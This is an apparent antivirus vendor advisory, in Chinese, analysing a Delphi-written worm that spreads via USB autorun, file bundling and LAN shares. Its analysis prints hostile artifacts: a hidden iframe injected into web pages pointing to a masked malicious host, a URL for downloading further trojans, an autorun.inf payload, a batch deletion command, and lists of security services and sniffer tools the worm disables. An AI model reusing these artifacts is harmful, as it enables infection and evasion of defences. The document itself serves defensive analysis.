捕獲時(shí)間
2009-1-12
病毒摘要
該樣本是使用“Delphi”編寫的蠕蟲程序,由微點(diǎn)主動(dòng)防御軟件自動(dòng)捕獲,采用“NsPacK”加殼與其它加殼的雙重加殼方式試圖躲避特征碼掃描,加殼后長度為 “76,295字節(jié)”,圖標(biāo)為“”,使用“exe”擴(kuò)展名,通過“網(wǎng)頁木馬”、“文件捆綁”、“移動(dòng)存儲介質(zhì)”、“局域網(wǎng)”等途徑植入用戶計(jì)算機(jī),運(yùn)行后下載其他木馬到本地運(yùn)行。
感染對象
Windows 2000/Windows XP/Windows 2003
傳播途徑
網(wǎng)頁木馬、文件捆綁、移動(dòng)存儲介質(zhì)
防范措施
已安裝使用微點(diǎn)主動(dòng)防御軟件的用戶,無須任何設(shè)置,微點(diǎn)主動(dòng)防御將自動(dòng)保護(hù)您的系統(tǒng)免受該病毒的入侵和破壞。無論您是否已經(jīng)升級到最新版本,微點(diǎn)主動(dòng)防御都能夠有效清除該病毒。如果您沒有將微點(diǎn)主動(dòng)防御軟件升級到最新版,微點(diǎn)主動(dòng)防御軟件在發(fā)現(xiàn)該病毒后將報(bào)警提示您發(fā)現(xiàn)“未知木馬”,請直接選擇刪除處理(如圖1);
圖1 微點(diǎn)主動(dòng)防御軟件自動(dòng)捕獲未知病毒(未升級)
如果您已經(jīng)將微點(diǎn)主動(dòng)防御軟件升級到最新版本,微點(diǎn)將報(bào)警提示您發(fā)現(xiàn)"Worm.Win32.AutoRun.jzn”,請直接選擇刪除(如圖2)。
圖2 微點(diǎn)主動(dòng)防御軟件升級后截獲已知病毒
對于未使用微點(diǎn)主動(dòng)防御軟件的用戶,微點(diǎn)反病毒專家建議:
1、不要在不明站點(diǎn)下載非官方版本的軟件進(jìn)行安裝,避免病毒通過捆綁的方式進(jìn)入您的系統(tǒng)。
2、建議關(guān)閉U盤自動(dòng)播放,具體操作步驟:開始->運(yùn)行->gpedit.msc->計(jì)算機(jī)配置->管理模板->系統(tǒng)->在右側(cè)找到"關(guān)閉自動(dòng)播放"->雙擊->選擇"已啟用"。
3、盡快將您的殺毒軟件特征庫升級到最新版本進(jìn)行查殺,并開啟防火墻攔截網(wǎng)絡(luò)異常訪問,如依然有異常情況請注意及時(shí)與專業(yè)的安全軟件廠商聯(lián)系獲取技術(shù)支持。
4、開啟windows自動(dòng)更新,及時(shí)打好漏洞補(bǔ)丁。
病毒分析
該樣本程序被執(zhí)行后,嘗試刪除目錄%SystemRoot%\system32\drivers\下“TXPlatform.exe”文件,拷貝自身為“TXPlatform.exe”文件,并調(diào)用運(yùn)行“TXPlatform.exe”開啟一個(gè)新的進(jìn)程,后結(jié)束自身進(jìn)程。
“TXPlatform.exe”進(jìn)程啟動(dòng)后,釋放名為“QQ.sys”的文件到目錄%SystemDrive%\下,并創(chuàng)建下列“RESSDT”服務(wù):
|
項(xiàng):
HKLM\SYSTEM\CurrentControlSet\Services\RESSDT
鍵值:DisplayName
指向數(shù)據(jù):RESSDT
健值:ImagePath
指向數(shù)據(jù):%SystemDrive %\QQ.sys |
|
服務(wù)創(chuàng)建成功后調(diào)用此服務(wù),驅(qū)動(dòng)加載后恢復(fù)系統(tǒng)SSDT表,解除計(jì)算機(jī)部分殺軟的主動(dòng)防御,達(dá)到自身保護(hù)的目的,成功后關(guān)閉此服務(wù),并將此服務(wù)與“QQ.sys”文件進(jìn)行刪除,實(shí)現(xiàn)對恢復(fù)系統(tǒng)SSDT表模塊的隱藏。
遍歷查找下列指定進(jìn)程,找到后嘗試關(guān)閉該進(jìn)程:
嘗試打開下列服務(wù),一旦成功打開便嘗試對該服務(wù)進(jìn)行下列的停止或刪除操作:
|
“Schedule” 停止服務(wù)
“sharedaccess” 停止服務(wù)
“kavsvc” 停止服務(wù)
“kavsvc” 刪除服務(wù)
“AVP” 停止服務(wù)
“AVP” 刪除服務(wù)
“McAfeeFramework” 停止服務(wù)
“McAfeeFramework” 刪除服務(wù)
“McShield” 停止服務(wù)
“McTaskManager” 停止服務(wù)
“McTaskManager” 刪除服務(wù)
“McShield” 刪除服務(wù)
“navapsvc” 刪除服務(wù)
“wscsvc” 刪除服務(wù)
“KPfwSvc” 刪除服務(wù)
“SNDSrvc” 刪除服務(wù)
“ccProxy” 刪除服務(wù)
“ccEvtMgr” 刪除服務(wù)
“ccSetMgr” 刪除服務(wù)
“SPBBCSvc” 刪除服務(wù)
“Symantec Core LC” 刪除服務(wù)
“NPFMntor” 刪除服務(wù)
“MskService” 刪除服務(wù)
“FireSvc” 刪除服務(wù)
“RsCCenter” 停止服務(wù)
“RsCCenter” 刪除服務(wù)
“RsRavMon” 停止服務(wù)
“RsRavMon” 刪除服務(wù) |
|
遍歷查找包含下列文字的窗口,一旦找到便終止該進(jìn)程:
|
Winsock Expert
ComnView
SmartSniff
Sniff
CaptureNet
Spinet
Dsniff
嗅探
抓包 |
|
修改注冊表去除隱藏文件和文件夾屬性,實(shí)現(xiàn)自身隱藏目的:
|
項(xiàng):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
鍵值:CheckedValue
數(shù)據(jù):0 |
|
刪除系統(tǒng)啟動(dòng)項(xiàng)HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下指定安全軟件的啟動(dòng)項(xiàng)鍵值,實(shí)現(xiàn)指定安全軟件不能隨機(jī)啟動(dòng):
|
鍵值:
kav
KAVPersonal50
AVP
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE |
|
添加注冊表啟動(dòng)項(xiàng),達(dá)到開機(jī)自啟動(dòng)目的:
|
項(xiàng):
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值:Explorer
數(shù)據(jù):%SystemRoot%\system32\drivers\TXPlatform.exe |
|
遍歷感染除下列指定的文件夾外的所有“.exe”文件為非PE文件,并嘗試調(diào)用“winrar.exe”的相關(guān)指令感染壓縮包內(nèi)的文件,實(shí)現(xiàn)破壞用戶文件資料與自身的自我保護(hù),并在感染過的文件夾下,創(chuàng)建一個(gè)記錄感染日期的名為“ desktop_1.ini”的文件,并修改屬性為“只讀”、“隱藏”與“系統(tǒng)”。
|
windows
winrar
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
common files
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone |
|
并遍歷查找“.htm”, “.html”, “.asp”, “.aspx”, “.jsp”, “.php”類型文件,找到后定位到文件末尾,添加下列代碼,實(shí)現(xiàn)對網(wǎng)頁類型文件的掛馬:
|
<iframe src="http://www.52**S.COM/goto/mm.Htm" width=0 height=0></iframe> |
|
刪除自身的除IPC$外的所有默認(rèn)共享,枚舉局域網(wǎng)共享,找到后嘗試使用指定的大量弱口令密碼與下列指定的用戶名進(jìn)行逐個(gè)嘗試訪問,成功后在局域網(wǎng)中傳播此病毒:
|
“Administrator”
“Guest”
“admin"
“Root”
“Apartment”
“Free”
“Both”
“Neutral” |
|
等待訪問下列網(wǎng)址木馬列表進(jìn)行下載其它木馬并在下載后自動(dòng)運(yùn)行:
|
http://www.52**S.COM/goto/down.txt |
|
并訪問下列網(wǎng)址進(jìn)行自身統(tǒng)計(jì):
|
http://www.52**s.com/TJ.Htm |
|
不斷遍歷磁盤,嘗試調(diào)用目錄%Temp%\下創(chuàng)建的隨機(jī)名稱批處理,刪除免疫文件夾,批處理內(nèi)容如下:
|
rmdir /s /q 盤符:\autorun.inf
del %0 |
|
拷貝自身名為“ .exe”到磁盤分區(qū)根目錄,并創(chuàng)建“autorun.inf”文件,均修改屬性為“只讀”、“隱藏”與“系統(tǒng)”,“autorun.inf”內(nèi)容為:
|
[AutoRun]
OPEN= .exe
shell\open=打開(&O)
shell\open\Command= .exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command= .exe |
|